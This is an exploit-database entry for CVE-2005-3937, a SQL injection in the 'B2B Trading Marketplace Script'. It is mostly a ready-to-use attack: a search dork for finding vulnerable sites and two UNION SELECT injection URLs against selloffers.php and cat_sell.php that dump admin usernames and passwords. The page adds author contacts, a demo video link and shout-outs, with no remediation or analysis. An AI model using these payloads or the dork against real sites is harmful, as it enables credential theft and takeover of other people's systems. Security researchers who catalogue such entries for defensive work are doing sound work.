B2B Trading Marketplace SQL Injection Vulnerability



EDB-ID: 10656 CVE: 2005-3937OSVDB-ID: 21252
Author: AnGrY BoYPublished: 2009-12-25Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
[+]  B2B Trading Marketplace SQL Injection Vulnerability
[+]  Software : B2B Trading Marketplace Script
[+]  Author   : AnGrY BoY
[+]  Contact  : h4kurd@hotmail.com & h4kurd@yahoo.com
[+]  Home     : http://www.kurd-security.com    http://www.h4kurd.com
=====================================================================================
[+]  Dork     : cat_sell.php?cid=  or  selloffers.php?cid=
[+]expolit:
http://localhost/path/selloffers.php?cid=1+union+all+select 1,concat(sb_admin_name,0x3e,sb_pwd),3,4,5,6,7,8+from+b2b_admin--
or
http://localhost/path/cat_sell.php?cid=1+union+all+select 1,concat(sb_admin_name,0x3e,sb_pwd),3,4,5,6,7,8+from+sbbleads_admin--
[+] example
[+] http://www.youtube.com/watch?v=uEK_Ah3htr0
======================================================================================
[+]Special Thanks:- Hangaw_hawlery & FormatXformaT   and all kurd-security members






Comments

No comments so far